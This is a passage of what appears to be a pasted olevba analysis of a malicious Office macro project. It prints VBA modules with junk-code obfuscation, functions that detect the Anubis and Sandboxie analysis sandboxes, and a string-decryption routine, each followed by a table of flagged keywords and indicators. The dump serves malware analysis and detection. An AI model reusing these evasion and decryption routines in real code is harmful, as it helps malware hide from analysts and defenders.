  1699.  
  1700. If "pTbPowrToB" = "pFEVpkQXCt" Then End
  1701.  
  1702. Dim NNaFlzJZLU As Integer
  1703. NNaFlzJZLU = 7:
  1704. Do While NNaFlzJZLU < 21
  1705.    DoEvents: NNaFlzJZLU = NNaFlzJZLU + 1
  1706. Loop
  1707.  
  1708. End Sub
  1709.  
  1710. Private Sub ROXvhZehfltUFGkWmbjzDmqLByyYBTpTivowY()
  1711.  
  1712. If "YnfDxIDyfk" = "CbvoCNtarA" Then End
  1713.  
  1714. Dim ICBYHfRbOR As Long
  1715. ICBYHfRbOR = "95":
  1716.  
  1717. GoTo wEopUZwLTc
  1718. wEopUZwLTc:
  1719.  
  1720. GoTo TOdIihKcZD
  1721. TOdIihKcZD:
  1722.  
  1723. If "yYGIjFrZvn" = "efQEgnsDKd" Then End
  1724.  
  1725. End Sub
  1726.  
  1727. Private Sub VJUthYHACPChenmxiuRPudkVPUGdSsJTvAukP()
  1728.  
  1729. Dim EhLAggoQrn As Integer
  1730. EhLAggoQrn = 7:
  1731. Do While EhLAggoQrn < 4
  1732.    DoEvents: EhLAggoQrn = EhLAggoQrn + 1
  1733. Loop
  1734.  
  1735. Dim WNOYmPvUlS As Long
  1736. WNOYmPvUlS = "4971":
  1737.  
  1738. If "sXDRBqclyl" = "rOxPaSxaye" Then End
  1739.  
  1740. If "ZdpNbcTWfj" = "eUSSRtMpTb" Then End
  1741.  
  1742. Dim owrToBpFEV As Long
  1743. owrToBpFEV = "3340":
  1744.  
  1745. End Sub
  1746.  
  1747. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  1748. ANALYSIS:
  1749. No suspicious keyword or IOC found.
  1750. -------------------------------------------------------------------------------
  1751. VBA MACRO sdfdsf.bas
  1752. in file: Rem_8392TN.xml - OLE stream: u'_VBA_PROJECT_CUR/VBA/sdfdsf'
  1753. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  1754. Private Declare Function GetVolumeInformation Lib "kernel32.dll" Alias "GetVolumeInformationA" (ByVal lpRootPathName As String, ByVal lpVolumeNameBuffer As String, ByVal nVolumeNameSize As Integer, lpVolumeSerialNumber As Long, lpMaximumComponentLength As Long, lpFileSystemFlags As Long, ByVal lpFileSystemNameBuffer As String, ByVal nFileSystemNameSize As Long) As Long
  1755.  
  1756. Function IsAnubisPresent(ByVal OptionToCheck As Integer) As Boolean
  1757.    On Error Resume Next
  1758.    Set WShell = CreateObject("WScript.Shell")
  1759.  
  1760.    Select Case OptionToCheck
  1761.        Case 1
  1762.            If GetSerialNumber(Environ("SystemDrive") & "\") = "1824245000" Then
  1763.                IsAnubisPresent = True
  1764.            Else
  1765.                IsAnubisPresent = False
  1766.            End If
  1767.        Case 2
  1768.            If WShell.RedRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductId") = "76487-337-8429955-22614" Then
  1769.                IsAnubisPresent = True
  1770.            Else
  1771.                IsAnubisPresent = False
  1772.            End If
  1773.        Case 3
  1774.            If UCase(App.EXEName) = "SAMPLE" Then
  1775.                IsAnubisPresent = True
  1776.            Else
  1777.                IsAnubisPresent = False
  1778.            End If
  1779.        Case 4
  1780.            If UCase(Environ("USERNAME")) = "USER" Then
  1781.                IsAnubisPresent = True
  1782.            Else
  1783.                IsAnubisPresent = False
  1784.            End If
  1785.    End Select
  1786. End Function
  1787.  
  1788. Public Function GetSerialNumber(DriveLetter As String) As Long
  1789.    Buffer1 = String$(255, Chr$(0))
  1790.    Buffer2 = String$(255, Chr$(0))
  1791.    Res = GetVolumeInformation(DriveLetter, Buffer1, Len(Buffer1), SerialNum, 0, 0, Buffer2, Len(Buffer2))
  1792.    GetSerialNumber = SerialNum
  1793. End Function
  1794. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  1795. ANALYSIS:
  1796. +------------+----------------+-----------------------------------------+
  1797. | Type       | Keyword        | Description                             |
  1798. +------------+----------------+-----------------------------------------+
  1799. | Suspicious | CreateObject   | May create an OLE object                |
  1800. | Suspicious | Lib            | May run code from a DLL                 |
  1801. | Suspicious | Shell          | May run an executable file or a system  |
  1802. |            |                | command                                 |
  1803. | Suspicious | WScript.Shell  | May run an executable file or a system  |
  1804. |            |                | command                                 |
  1805. | Suspicious | Environ        | May read system environment variables   |
  1806. | Suspicious | Windows        | May enumerate application windows (if   |
  1807. |            |                | combined with Shell.Application object) |
  1808. | Suspicious | Chr            | May attempt to obfuscate specific       |
  1809. |            |                | strings                                 |
  1810. | Suspicious | Hex Strings    | Hex-encoded strings were detected, may  |
  1811. |            |                | be used to obfuscate strings (option    |
  1812. |            |                | --decode to see all)                    |
  1813. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  1814. |            |                | may be used to obfuscate strings        |
  1815. |            |                | (option --decode to see all)            |
  1816. | IOC        | kernel32.dll   | Executable file name                    |
  1817. +------------+----------------+-----------------------------------------+
  1818. -------------------------------------------------------------------------------
  1819. VBA MACRO sdfsdfsdf.bas
  1820. in file: Rem_8392TN.xml - OLE stream: u'_VBA_PROJECT_CUR/VBA/sdfsdfsdf'
  1821. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  1822. Public Declare Function GetModuleHandle Lib "kernel32" Alias "GetModuleHandleA" (ByVal lpModuleName As String) As Long
  1823.  
  1824. Function IsSandBoxiePresent(ByVal OptionToCheck As Integer) As Boolean
  1825.    Select Case OptionToCheck
  1826.        Case 1  'Recomendado
  1827.           Dim hSbie As Long
  1828.  
  1829.            hSbie = GetModuleHandle("SbieDll.dll")
  1830.            If hSbie <> 0 Then
  1831.                IsSandBoxiePresent = True
  1832.            Else
  1833.                IsSandBoxiePresent = False
  1834.            End If
  1835.        Case 2  'No recomendado
  1836.           If InStr(MainFrm.Caption, "[#]") <> 0 Then
  1837.                IsSandBoxiePresent = True
  1838.            Else
  1839.                IsSandBoxiePresent = False
  1840.            End If
  1841.    End Select
  1842. End Function
  1843. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  1844. ANALYSIS:
  1845. +------------+----------------+-----------------------------------------+
  1846. | Type       | Keyword        | Description                             |
  1847. +------------+----------------+-----------------------------------------+
  1848. | Suspicious | Lib            | May run code from a DLL                 |
  1849. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  1850. |            |                | may be used to obfuscate strings        |
  1851. |            |                | (option --decode to see all)            |
  1852. | IOC        | SbieDll.dll    | Executable file name                    |
  1853. +------------+----------------+-----------------------------------------+
  1854. -------------------------------------------------------------------------------
  1855. VBA MACRO sdfsdfsdffff.bas
  1856. in file: Rem_8392TN.xml - OLE stream: u'_VBA_PROJECT_CUR/VBA/sdfsdfsdffff'
  1857. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  1858. Public Function MkSrpQP(ByVal strData As String, ByVal strKey As String)
  1859. Dim bData() As Byte
  1860. Dim cSIQhPPCpQ As Integer
  1861. For cSIQhPPCpQ = 0 To 0
  1862. If cSIQhPPCpQ = 5 Then End
  1863. Next cSIQhPPCpQ
  1864. Dim BGOEkt As Integer
  1865. For BGOEkt = 0 To 0
  1866. If BGOEkt = 5 Then End
  1867. Next BGOEkt
  1868. Dim bKey() As Byte
  1869. Dim mCDZb As Integer
  1870. For mCDZb = 0 To 0
  1871. If mCDZb = 5 Then End
  1872. Next mCDZb
  1873. Dim hDCeLdOSt As Integer
  1874. For hDCeLdOSt = 0 To 0
  1875. If hDCeLdOSt = 5 Then End
  1876. Next hDCeLdOSt
  1877. bData = StrConv(strData, vbFromUnicode)
  1878. Dim iALAxrJGeN As Integer
  1879. For iALAxrJGeN = 0 To 0
  1880. If iALAxrJGeN = 5 Then End
  1881. Next iALAxrJGeN
  1882. Dim DCeLdO As Integer
  1883. For DCeLdO = 0 To 0
  1884. If DCeLdO = 5 Then End
  1885. Next DCeLdO
  1886. bKey = StrConv(strKey, vbFromUnicode)
  1887. Dim sGQzzmmNQKfJiAL As Integer
  1888. For sGQzzmmNQKfJiAL = 0 To 0
  1889. If sGQzzmmNQKfJiAL = 5 Then End
  1890. Next sGQzzmmNQKfJiAL
  1891. Dim tSeZqoKgExtE As Integer
  1892. For tSeZqoKgExtE = 0 To 0
  1893. If tSeZqoKgExtE = 5 Then End
  1894. Next tSeZqoKgExtE
  1895. For i = 0 To UBound(bData)
  1896. Dim MLQBuBgGsI As Integer
  1897. For MLQBuBgGsI = 0 To 0
  1898. If MLQBuBgGsI = 5 Then End
  1899. Next MLQBuBgGsI
  1900. Dim PRyEYg As Integer
  1901. For PRyEYg = 0 To 0
  1902. If PRyEYg = 5 Then End
  1903. Next PRyEYg
  1904. If i <= UBound(bKey) Then
  1905. Dim zAhBGOEktusx As Integer
  1906. For zAhBGOEktusx = 0 To 0
  1907. If zAhBGOEktusx = 5 Then End
  1908. Next zAhBGOEktusx
  1909. Dim QSHcSIQ As Integer
  1910. For QSHcSIQ = 0 To 0
  1911. If QSHcSIQ = 5 Then End
  1912. Next QSHcSIQ
  1913. bData(i) = bData(i) - bKey(i)
  1914. Dim ALAxrJ As Integer
  1915. For ALAxrJ = 0 To 0
  1916. If ALAxrJ = 5 Then End
  1917. Next ALAxrJ
  1918. Dim DbVzAhBG As Integer
  1919. For DbVzAhBG = 0 To 0
  1920. If DbVzAhBG = 5 Then End
  1921. Next DbVzAhBG
  1922. Else
  1923. Dim ddchRKRwJIZc As Integer
  1924. For ddchRKRwJIZc = 0 To 0
  1925. If ddchRKRwJIZc = 5 Then End
  1926. Next ddchRKRwJIZc
  1927. Dim vSNrta As Integer
  1928. For vSNrta = 0 To 0
  1929. If vSNrta = 5 Then End
  1930. Next vSNrta
  1931. bData(i) = bData(i) - bKey(i Mod UBound(bKey))
  1932. Dim aeEspjB As Integer
  1933. For aeEspjB = 0 To 0
  1934. If aeEspjB = 5 Then End
  1935. Next aeEspjB
  1936. Dim ZhuVqUtK As Integer
  1937. For ZhuVqUtK = 0 To 0
  1938. If ZhuVqUtK = 5 Then End
  1939. Next ZhuVqUtK
  1940. End If
  1941. Dim pQoae As Integer
  1942. For pQoae = 0 To 0
  1943. If pQoae = 5 Then End
  1944. Next pQoae
  1945. Dim xxZhuVqUtKlL As Integer
  1946. For xxZhuVqUtKlL = 0 To 0
  1947. If xxZhuVqUtKlL = 5 Then End
  1948. Next xxZhuVqUtKlL
  1949. Next i
  1950. Dim spjBzVrPV As Integer
  1951. For spjBzVrPV = 0 To 0
  1952. If spjBzVrPV = 5 Then End
  1953. Next spjBzVrPV
  1954. Dim PkMRfcKYxxZ As Integer
  1955. For PkMRfcKYxxZ = 0 To 0
  1956. If PkMRfcKYxxZ = 5 Then End
  1957. Next PkMRfcKYxxZ
  1958.  MkSrpQP = StrConv(bData, vbUnicode)
  1959. Dim QScmhKas As Integer
  1960. For QScmhKas = 0 To 0
  1961. If QScmhKas = 5 Then End
  1962. Next QScmhKas
  1963. Dim xNdkmv As Integer
  1964. For xNdkmv = 0 To 0
  1965. If xNdkmv = 5 Then End
  1966. Next xNdkmv
  1967. End Function
  1968.  
  1969. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  1970. ANALYSIS:
  1971. No suspicious keyword or IOC found.
RAW Paste Data
Top